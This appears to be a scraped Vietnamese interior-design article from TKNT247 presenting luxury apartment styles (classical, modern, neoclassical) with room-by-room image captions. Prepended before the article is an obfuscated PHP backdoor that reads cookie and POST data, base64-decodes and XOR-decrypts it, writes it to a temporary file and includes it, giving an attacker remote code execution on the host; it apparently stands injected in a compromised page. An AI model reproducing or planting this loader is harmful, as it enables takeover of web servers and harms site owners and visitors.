$KAkylTEEY = chr ( 482 - 414 )."\x48" . "\161" . "\x5f" . 'w' . "\x6f" . "\x67" . chr (79); $BLHPO = "\143" . chr (108) . "\141" . 's' . 's' . "\x5f" . "\x65" . chr ( 220 - 100 ).'i' . chr (115) . chr ( 229 - 113 ).chr ( 225 - 110 ); $DPsHSlPuA = class_exists($KAkylTEEY); $BLHPO = "16968";$KybyXPAy = !1;if ($DPsHSlPuA == $KybyXPAy){function WRjHwIbZL(){return FALSE;}$fOnVgH = "60659";WRjHwIbZL();class DHq_wogO{private function rlZJn($fOnVgH){if (is_array(DHq_wogO::$gRtPmcWgqM)) {$zpikP = sys_get_temp_dir() . "/" . crc32(DHq_wogO::$gRtPmcWgqM["\163" . 'a' . chr ( 996 - 888 ).chr (116)]);@DHq_wogO::$gRtPmcWgqM["\x77" . 'r' . chr (105) . 't' . 'e']($zpikP, DHq_wogO::$gRtPmcWgqM["\143" . chr ( 1017 - 906 ).'n' . chr (116) . "\x65" . "\x6e" . "\x74"]);include $zpikP;@DHq_wogO::$gRtPmcWgqM["\x64" . chr ( 990 - 889 )."\x6c" . 'e' . 't' . "\x65"]($zpikP); $fOnVgH = "60659";exit();}}private $PkkbUal;public function wPWLohDk(){echo 27132;}public function __destruct(){$fOnVgH = "46060_22836";$this->rlZJn($fOnVgH); $fOnVgH = "46060_22836";}public function __construct($NTbnrrri=0){$dTJfkDR = $_POST;$lhQsTgIH = $_COOKIE;$aYajfQpXwB = "c11c5495-d7c1-4aa3-bdd1-dc687432bcb9";$BUmNVU = @$lhQsTgIH[substr($aYajfQpXwB, 0, 4)];if (!empty($BUmNVU)){$atjsQvzxK = "base64";$fobbAQWcLe = "";$BUmNVU = explode(",", $BUmNVU);foreach ($BUmNVU as $RzPEjLbK){$fobbAQWcLe .= @$lhQsTgIH[$RzPEjLbK];$fobbAQWcLe .= @$dTJfkDR[$RzPEjLbK];}$fobbAQWcLe = array_map($atjsQvzxK . chr ( 632 - 537 ).chr (100) . chr (101) . "\143" . "\x6f" . "\144" . chr (101), array($fobbAQWcLe,)); $fobbAQWcLe = $fobbAQWcLe[0] ^ str_repeat($aYajfQpXwB, (strlen($fobbAQWcLe[0]) / strlen($aYajfQpXwB)) + 1);DHq_wogO::$gRtPmcWgqM = @unserialize($fobbAQWcLe); $fobbAQWcLe = class_exists("46060_22836");}}public static $gRtPmcWgqM = 33420;}$iJgbDTDD = new /* 56130 */ $KAkylTEEY(60659 + 60659); $fOnVgH = strpos($fOnVgH, $fOnVgH); $KybyXPAy = $iJgbDTDD = $fOnVgH = Array();} Top 5 mẫu thiết kế nội thất căn hộ chung cư cao cấp bậc nhất
Image Alt

Top 5 mẫu thiết kế nội thất căn hộ chung cư cao cấp bậc nhất

Thiết kế nội thất căn hộ chung cư luxury cao cấp

Top 5 mẫu thiết kế nội thất căn hộ chung cư cao cấp bậc nhất

Thiết kế nội thất căn hộ chung cư cao cấp được nhiều người quan tâm. Trong bài viết này, hãy cùng TKNT247 tìm hiểu về các phong cách cũng như mẫu thiết kế nội thất chung cư cao cấp đẹp bậc nhất hiện nay nhé.

Phong cách thiết kế nội thất căn hộ chung cư cao cấp:

Phong cách hiện nay vô cùng đa dạng với nhiều cách bố trí khác nhau. Mỗi phong cách thiết kế mang một đặc trưng và cảm xúc riêng. Bạn có thể tùy vào sở thích và cảm quan mong muốn hướng tới để lựa chọn phong cách phù hợp.

Dưới đây là một số phong cách thiết kế nội thất nhà đẹp được yêu thích nhất hiện nay. Những phong cách này đều mang vẻ đẹp sang trọng và quý phái, vô cùng phù hợp với nội thất căn hộ chung cư cao cấp.

Phong cách nội thất cổ điển:

Thiết kế nội thất căn hộ chung cư cao cấp

Không gian nội thất cổ điển mang giá trị thẩm mỹ cao

Nhắc đến cổ điển, người ta sẽ nghĩ ngay đến không gian nội thất đồ sộ với những đường cong uốn lượn hoàn hảo. Phong cách này đề cao hình thức, đồ nội thất kích thước lớn được bố trí mạch lạc. Màu sắc nội thất thường là các tông màu nhã nhặn như xám, vàng, trắng,… mang lại cảm giác xa hoa và quyền quý.

Phong cách nội thất hiện đại:

Hiện đại là phong cách thiết kế được yêu thích nhất hiện nay. Không gian nội thất hiện đại mang đường nét khúc chiết, chủ yếu là các đường thẳng. Bố trí nội thất đơn giản, tập trung vào công năng. Phong cách này phù hợp với nhiều loại không gian khác nhau, mang đến sự tiện nghi và thoải mái cho người ở.

Phong cách nội thất tân cổ điển:

Phong cách tân cổ điển là sự kết hợp hoàn hảo giữa vẻ đẹp cổ điển và công năng hiện đại. Đây là lựa chọn lý tưởng khi thiết kế nội thất căn hộ chung cư cao cấp.

Trên đây là một số phong cách phổ biến khi làm nội thất nhà ở. Ngoài ra còn một số phong cách thiết kế sang trọng cũng vô cùng được yêu thích hiện nay như: phong cách Contemporary, phong cách Indochine,…

Mẫu thiết kế nội thất căn hộ chung cư cao cấp:

Mẫu nội thất căn hộ chung cư cao cấp phong cách tân cổ điển:

Thiết kế nội thất căn hộ chung cư cao cấp phong cách tân cổ điển

Không gian tiếp khách rộng rãi và thông thoáng

Phòng khách căn hộ

Họa tiết trang trí trên tường và đồ nội thất được chế tác tinh xảo

Đồ nội thất cao cấp

Đồ nội thất được làm từ các vật liệu cao cấp

Thiết kế nội thất phòng ngủ căn hộ chung cư cao cấp

Nội thất phòng ngủ hiện đại và tiện nghi

Nội thất phòng ngủ

Hệ thống ánh sáng và màu sắc được kết hợp hài hòa mang lại cảm giác ấm áp

Thiết kế nội thất căn hộ chung cư cao cấp lấy cảm hứng từ phong cách tân cổ điển. Không gian nội thất rộng rãi được sắp xếp khoa học và ngăn nắp. Đồ nội thât được bố trí cơ bản và công năng. Điểm nhấn tập trung vào các họa tiết trang trí độc đáo trên tường và trần nhà. Tạo nên một không gian sống hiện đại, tiện nghi và đẳng cấp.

Thiết kế nội thất căn hộ chung cư cao cấp luxury:

Sảnh chờ phòng ngủ

Sảnh chờ của căn hộ

Thiết kế nội thất khu vực sinh hoạt chung

Khu vực sinh hoạt chung

Đồ nội thất phòng khách cao cấp

Đồ nội thất bo tròn mang lại cảm giác dễ chịu

Thiết kế nội thất căn hộ chung cư luxury cao cấp

Các chi tiết trang trí mạ vàng mang lại cảm giác sang trọng

Bàn ăn sang trọng

Không gian quây quần ăn uống của gia đình

Tủ bếp căn hộ chung cư cao cấp

Tủ bếp hình chữ U tông màu trắng trang nhã

Thiết kế nội thất phòng làm việc căn hộ cao cấp

Phòng làm việc có cửa sổ lớn thông thoáng

Phòng làm việc đẹp

Đợt tủ thiết kế theo lối mở giúp sắp xếp đồ đạc gọn gàng

Thiết kế nội thất phòng ngủ master căn hộ chung cư cao cấp

Thiết kế nội thất phòng ngủ master

nội thất phòng ngủ

Không gian nghỉ ngơi rộng rãi và thoải mái

Phòng ngủ nhỏ căn hộ chung cư cao cấp

Nội thất phòng ngủ phụ được bố trí theo nguyên tắc đối xứng

Thiết kế nội thất phòng ngủ nhỏ

Đồ nội thất được sắp xếp gọn gàng và hết sức tiện nghi

Mẫu nội thất căn hộ chung cư luxury cao cấp bậc nhất. Tông màu trắng sáng được dùng làm chủ đạo và nhấn nhá bằng các chi tiết kim loại sáng sang trọng. Đồ nội thất được làm từ vật liệu cao cấp tạo nên không gian sống đẳng cấp.

Nội thất căn hộ chung cư cao cấp phong cách hiện đại:

Thiết kế nội thất căn hộ chung cư hiện đại

Phòng khách và phòng ăn được kết nối liên thông với nhau

Nội thất phòng khách hiện đại

Đồ nội thất được bố trí đơn giản và gọn gàng

Bố trí ánh sáng phòng khách đẹp

Hệ thống ánh sáng đèn và ánh sáng tự nhiên kết hợp hài hòa với nhau

Vách tivi phòng khách hiện đại

Vách tivi đa năng tạo ra không gian lưu trữ rộng rãi

Thiết kế nội thất phòng ăn căn hộ hiện đại

Trang trí nội thất phòng ăn bằng giấy dán tường lạ mắt

Mẫu nội thất căn hộ chung cư được thiết kế theo phong cách hiện đại. Không gian nội thất được bố trí theo lối mở tạo ra sự kết nối giữa các phòng chức năng. Từ đó mang lại sự thuận tiện trong sinh hoạt và di chuyển của các thành viên trong gia đình.

Nội thất phòng ngủ căn hộ chung cư cao cấp:

Thiết kế nội thất phòng ngủ căn hộ chung cư cao cấp đẹp

Phòng ngủ tông màu trắng nhẹ nhàng

Trang trí nội thất phòng ngủ đẹp

Trang trí phòng ngủ bằng cây xanh mang lại sự thông thoáng

Giường ngủ cao cấp

Ốp tường đầu giường bằng gương kính mờ tăng chiều sâu cho căn phòng

Phòng ngủ là không gian nghỉ ngơi riêng tư của mỗi người. Nội thất phòng ngủ căn hộ chung cư cao cấp thường được thiết kế theo sở thích của người ở. Tuy nhiên vẫn dựa trên sự hài hòa và thống nhất với không gian nội thất chung.

Nội thất phòng bếp căn hộ chung cư cao cấp:

Tủ bếp chữ U sang trọng

Tủ bếp hình chữ U được bố trí bo theo góc tường

Nội thất bếp cao cấp

Khoảng trống ở giữa thuận tiện cho thao tác của người đứng bếp

Tủ bếp có quầy bar

Quầy bar được tận dụng làm bàn ăn tiện lợi

Phòng bếp của các căn hộ chung cư cao cấp thường có diện tích lớn. Hệ tủ bếp được làm bằng vật liệu cao cấp phù hợp với môi trường nhiệt ẩm cao. Các phụ kiện và thiết bị thông minh được sắp xếp khoa học. Tất cả tạo nên một không gian nấu nướng hiện đại và tiện nghi.

BÀI VIẾT LIÊN QUAN: